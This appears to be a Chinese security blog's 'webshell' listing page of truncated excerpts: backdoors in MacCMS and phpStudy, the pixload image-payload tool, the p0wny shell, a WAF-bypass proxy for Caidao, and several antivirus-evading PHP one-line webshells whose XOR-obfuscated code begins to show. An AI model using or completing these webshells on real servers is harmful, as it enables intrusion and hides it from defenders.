webshell

苹果CMS/MacCMS 苹果CMS是国内优秀的开源PHP建站系统，擅长电影程序影视系统这一块，在主流建站系统中特色鲜明，以灵活、小巧、兼容性好、负载强等优点而深受许多站长的喜爱。 MacCMS后门Webshell 某天...

phpStudy后门介绍 phpStudy是国内一款免费的PHP环境集成包，集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer等多款软件，无需配置即可直接安装使用，有着近百万PHP用户。近日被爆出phpStudy存在RCE后门，...

pixload 用于创建/将Payload注入图片的工具集。其用途与安全防范场景例如：绕过CSP防护，用图片隐藏恶意攻击代码，在图片中编码webshell，利用图片进行XSS等等。 pixload安装 需要以下Perl模块： GD...

venom 33的更新，webshell免杀PHP一句话，体积更小了。 <?php class VMTX{ function __destruct(){ $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20"; return @$BRLI("$this->EKDL"); } } $vmtx=new VMTX(); @$vmt...

ArbitraryPHP - 任意PHP代码执行扩展 这是一个实验性的PHP扩展，加载这个扩展后，每次请求将可以执行一段自己的PHP代码。 可用于： 管理目标PHP站点（webshell）HOOK与分析HTTP执行流程在不修改源代码...

免杀PHP一句话shell，利用随机异或免杀D盾，免杀安全狗护卫神等 <?php class VONE { function HALB() { $rlf = 'B' ^ "\x23"; $fzq = 'D' ^ "\x37"; $fgu = 'h' ^ "\x1b"; $sbe = 'R' ^ "\x37"; ...

p0wny @hell：单文件PHP Shell p0wny @hell 是一个非常基本的单文件PHP shell。当测试PHP应用程序时，它可用于在服务器上快速执行命令。请谨慎使用：此脚本表示服务器存在安全风险，它是类似于webshell的脚本...

SQL写WebShell条件 在mysql的配置文件 my.ini 中，secure_file_priv="c:/wamp64/tmp" 被注释 或者 `secure_file_priv 配置的位置是web目录。未开启全局gpc。 环境准备 存在SQL注入的URL，测试语句 h...

CaidaoMitmProxy 基于HTTP代理中转中国菜刀过WAF,基于菜刀20160622版本修改和测试。理论上是支持低版本菜刀。本人没测试希望大家来帮忙测试下。 安装 pip[3] install pydespip[3] install mitmproxy ...

免杀PHP一句话 过最新D盾等，webshell变量随机，增加流量传输编码方式 免杀webshell PHP一句话 class LTDS { public function __destruct() { $bxo='X'^"\x39"; $woa='?'^"\x4c"; $ukt='K'^"\x38"; $gu...